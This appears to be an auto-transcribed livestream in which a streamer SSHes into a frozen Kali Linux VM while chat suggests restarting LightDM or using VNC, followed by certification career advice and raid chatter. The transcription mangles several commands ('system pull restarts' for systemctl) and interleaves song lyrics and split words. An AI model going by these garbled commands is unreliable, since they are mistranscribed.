Isn't an alias. You can using port 22 as an example, since SSH should be running. TNC.
translated from Portuguese.
What did I type? Yeah, I typed TNC.
Yay, switch 5900 to 22.
John says Neovermispist says.
Disable ads. Jeez. Tongue.
I can't. Okay, that worked. So then I should be able to remote into it. I don't know what I'm going to do once I do that.
Hack the Planet says.
Test succeeded. True means the port is running a service you can use.
Okay. All right. Now what? All right. Now what can I do?
Pebble Free says.
W hacking ourselves.
Hack the Planet says.
Surprised you haven't set up VNC yet.
Wait. No, wait. What's no VNC? Isn't that the same as Spice? All right, I have to Google because now that I'm there, I don't know. Wait, did it free itself up? No.
VNC is a lightweight remote desktop protocol that you can set up on Linux. Usually runs on 5900 by default.
Pebble Free says.
You were gonna restart something from the SSH session, right?
No, I mean I can reset it just by rebooting it. I'm trying to unfreeze it. Yeah, this was just, I'm SSH'd in for no reason.
John says Neovermispist says.
Well, time to do outside stuff.
That.
Pebble Free says.
Cypher Enigma said you could try Shin in and restarting Spice.
John says Neovermispist says.
Get good day.
Correct.
Start winning.
Correct.
Hack the Planet says.
Web link.
Fight the planet!
Okay, that's next. Nope. Yeah. Nope. Restarting Spice isn't the problem. Yeah, I don't know why I started on this rabbit hole. Being able to SSH into the box, I mean, it's running, but like the GUI is completely borked. The GUI is borked. Like,
Have you tried just closing your existing Spice window and
Yeah.
opening a new Spice window?
yeah, but let me try it again now that we've been in and out.
Pebble Free
Yeah.
says,
It's locked.
You can't restart the GUI somehow from Kali?
From the command line? I don't know. We have to keep Googling. I don't think you can. Is it the GUI or desktop?
Hack the Planet says,
System pull restarts 4. Not sure what the service name is for the desktop service.
Pebble Free says,
Hack the Planet, you try this.
I can't remember the, what is it? Let's search for that. Okay. My feet hurt now.
Hack the Planet says,
AI says a pseudo system pull restarts 4 session.
Hello. XFCE. AI. Huh. Interesting AI. Putting my machine's life in AI's hands. Yeah, I'm fine with that. Failed.
Cocus says,
System pull status is tab.
Yeah, that's what I'm trying.
It'll show you the services.
It's just binging at me. There's an XRDP. I don't think that's it though.
Hack the Planet says,
There we go.
Do a system to list units.
Pebble Free says,
Lighten?
Translated from Haitian Creole. Cocus says,
Should probably look up what GUI Kali uses. I'll do that.
I thought it
raw.
was XSFE also.
Kali Linux, a Debian-based Linux distribution, can use multiple graphical user interfaces, GUIs, including SS, GNOME, and KDE. So it might be GNOME or KDE.
Liars.
I'd say try to list units and grep for those.
Pebble Free says,
cat / etc / x11 / default display manager. Carrot says AI.
I love how everyone's like, shit's wrong, it's AI, man. Light DM. Oh!
FD85915 says,
We trust in AI Kappa.
Well, I think that did it.
Pebble Free says,
Did it get borked?
I think it got borked.
Hack the Planet says,
Check USSH terminal.
FD85915 says,
Not looking good, what face?
Hack the Planet says,
It may have failed.
Pebble Free says,
B7H30 ouch.
Hack the Planet says,
System plus status lighten.
Oh,
Nice. Type W at your SSH terminal to see if that session is still logged in.
You're making our love worse. You're breaking my heart with every breath you take. I pray it's not over. I need your lips to keep me safe.
this is not worth the effort.
Yeah, just give it a reboot.
Yep. We tried. We tried, everyone. Thank you. Thank you. Thank you. That's what I was looking for. Well, I think I got it all. I think I got it all. How about... I gotta end it, but how about we do some
Could have just typed sudo reboot at the SSH terminal.
yeah, what fun is
D.
that? about I'm gonna
Gotta
hit it
get
again.
you set up with VNC on this thing. It's probably easier than using your Proxmox directly.
Yeah, we can use. Well, I've been using Spice, but not Tiger. We can use Tiger. It comes back up, I'll do that. But I think I gotta hit it again. It's not doing anything. Ugh. I'm not liking this. I'm not liking this. It's coming back with. I'm gonna try to hit it hard.
Grassam says.
That was hopeful.
Howdy.
Grassam.
Only stopping by to ask a question, since is late for me. How are the labs from this certificates compared to the labs from HTB/THM?
Pebble Free says.
For A.
We got it. The labs from what? OffSec? They're okay. I mean, they're definitive. Like they're covering everything.
Grassam says.
Yes, from certificates.
Mm-hmm. All right, let's do Tiger. And let's shut down the machines running on it. How's that sound? Right? No, I should be able to update
more
it.
Complex, harder, more lifelike?
Oh, right now I'm just doing whatever's on that Lane Kusanagi list for boxes. I'm not in Proving Grounds.
Pebble Free says.
Grassam, the labs are tailored for each modules. The challenge labs are more like CTFs, and aren't bad.
I thought I had a console for the box itself. Here. Shell. Yeah.
Madam Fabulous says.
Did you make it back in?
No, we reset it. Yeah, we SSH'd in, but nothing we tried worked. Nothing we tried worked.
Grassam says.
Also a professional question, if I get my university degree, should I still get an entry-level certificate or should I try get a mid-level certificate? For example, CompTIE
It
Security
depends.
Plus versus Che.
Madam Fabulous says.
FBM.
Hack the Planet says.
Nah, install Tiger VNC server on the Kali machine itself. No reason to install VNC on your Proxmox server.
Grossum, it depends on where you are. And geographically, what you know what I mean? What the job market looks like. Yeah, I would, but I mean, I would look at getting an entry-level certificate. CompTIA Security Plus is going to be more knowledge-based, whereas CH is, I believe, is Certified Ethical Hacker is still more hands-on. I'd focus more on meeting people and relationship building. Okay. I'm pretty sure I'm updated.
What's crazy is that if you look for a certificate, they take your time and your money. But if you look for a job, they take your time, but they give you money instead.
Grossum says.
Some other advice I received was not to get certificates because company will cover the cost of them once you get hired.
Yeah, that happens. That happens. But like lower level certificates, like some of the CompTIAs, might not be a bad idea.
FD85915 says.
Isn't Che also known as the Certified Script Kitty Kappa?
No, it got a bad rap over here in the States because it was being used to vet government or military experience, but I believe some of the answers got out, and it wasn't looked on as favorably.
Grossum says.
It's FT85915.
Translated from Malay. Hack the Planet says.
For entry-level jobs, I hear that a lot of people have to interview for like 10 to 20 jobs before they get hired.
Rolly GG says.
10 to 20 is nothing right now.
If you're asking me though, yes, that stuff is important, but just as important is relationship building. You should be going out and meeting people face to face, going to meetups, going to cons locally.
Grossum says.
I read Tribes of Hackers Red Team, and people interviewed in this books, a lot of them were ex-military.
Like guns, drugs, I've seen it all, but that was not the path I chose. Frequency was way too low, so I avoid. Keep moving on, keep moving on, keep moving on. In the latest hours, I evolve my power. This is the moment to do it louder. I didn't
Well,
could take me miles away, and all I know is I am strong and need a
Hack the Planet says.
Yeah, once your feet out in the door, knowing people helps a great deal in finding your next role or pivoting to a new role if the one you've got isn't working out.
Grossum says.
I think also participating at CTF hosted in cybersecurity events help.
yes, because that helps you meet people. Agree. Noise? No.
Look at me and smile, acting all unsurprised.
Then a bounce. Thank you for the info. Have a great time streaming and a fantastic weekend. Good day to everyone in chat.
Hack the Planet says.
Right on, Grassum. Have a good night.
Translated from French.
Soiree. No, I don't think so. No. O. It won't be O here. It won't be E. But that shuffles the letters around. Maybe that will help us figure out. Oh, it's not even in the list.
It will help you test 4 positions. D.
RIOS. You dick.
Ted2 says. Hi there.
I hate that. Well, it's been a while since I've upgraded and updated my Kali.
Hack the Planet says.
It's been a while since I've exercised. D.
Yeah. Actually, me too.
Things must be easier for you. everything I know, and I'm trying so hard.
Coca says,
I did like 10 squats last week, seems good.
Good for you.
Pebble Free says,
Okay, gang.
Wow. I got it. Hard one.
Ugh. That was 4 hours. Flew by just like that. We're going to raid Jess. Hang around. Lumi got a she redid Lumi and they're playing Helldivers right now.
Stream Element says,
Poof.
Theo
New box
Riff
next time.
Raffin
Yep.
Mount.
Yeah, I know it's
B7H
funny.
30 Tobby
Poof.
7H.
I know it's funny. We're getting there. We're getting there.
Pebble Free says,
New box next time.
Yeah.
XT.
Yep. Have a great day. Thanks for hanging out. We'll see you later, Pebble, Tagora, Jess and Nori, even though they're playing, Super Germal, Cypher, Dr. Deadclick, Ragano, FT, Ice Black, Colchis, Neospring,
Coca says,
Pebble, Pinnock,
Catch you later, man wavy.
Rolly, and Whitestone and Tagora. See you later. Have a good night. Thank you all for hanging out while we're going through this shit. Thank you.
It's all of the waves they keep chasing after me. Even though
Uh-oh.
I can feel the water on my feet.
She just ended.
How about that law?
Yeah. I was just about to like send everyone and she went to her thank you for watching stream. Ragano's on.
Stream Element says,
Right, Jess just rated the channel with 12 viewers. Pop channel.
Flo says,
Britjess Flock is swooping in.
Jess,
Britjess Flock is swooping in.
thank you for
Bridge
the
Bridge
raid.
Love, Bridge sunglasses.
Jess says,
British Flock is
I almost
swooping in.
rated you.
British Flock
I almost
is
just
swooping
rated
in.
you.
British sunglasses, British raid, British love.
Talon Rose says,
Talon,
3.
Geek Girl, Jess,
FD85915 says,
Reaver raid lol.
Reverse raid. Well, how was Helldivers? Again, gang, if you don't already follow on Jess, click that, well, wherever this time, over here. Click that heart. Well, hope you had fun spreading democracy.
Jess says,
I heard, so I quick raided U-turn.
That's funny. Yeah. Ragano's playing some Street Fighter right now.
It was fine.
Let's do that. Ragano's friend of the stream. Round 2. Trying again. Well, Raiders, thank you kindly for swooping in. Hope you had a fun time watching Jess play Helldivers. And we're going to slide now over to Ragano, who's playing Street Fighter. He's ranked. Platinum? Is that a thing?
Fallen Charlotte says,
Jess just fine. I see how it is Lumaya Chublap.
Jess says,
I mean, I was already in the process of raiding you but ended it quicker when Nori said you were raiding out too.
Charlotte, were you playing?
Fallen Charlotte says,
Yes.
translated from Indonesian.
I may be playing tonight when I get home. We got another event here.
Jess says,
Fallen Charlotte, well, I did die more than anyone else to team kills.
All right, gang.
Stream Element says,
Thank you again for hanging out. Thank you for the raid, Jess.
Theo Riff Raff inbound.
Oof. Have a good night, everyone. Enjoy your day. And see you tomorrow. With more hacks.
Madam Fabulous says,
Ooh.
translated from Indonesian. Viral Jessica says,
Bleed purple.
Drogasika. Good song. Bye-bye.
Jess says,
Good night.
Good night. Theo partying with us tonight, not ha. HT.
translated
Oh,
from
that's right.
German.
VR tonight. Boop. Okay, YouTube. You get a tiny mower while I'm saying hello to wow, his raid thing is like loud. Oh, there's no one on YouTube. Bye-bye.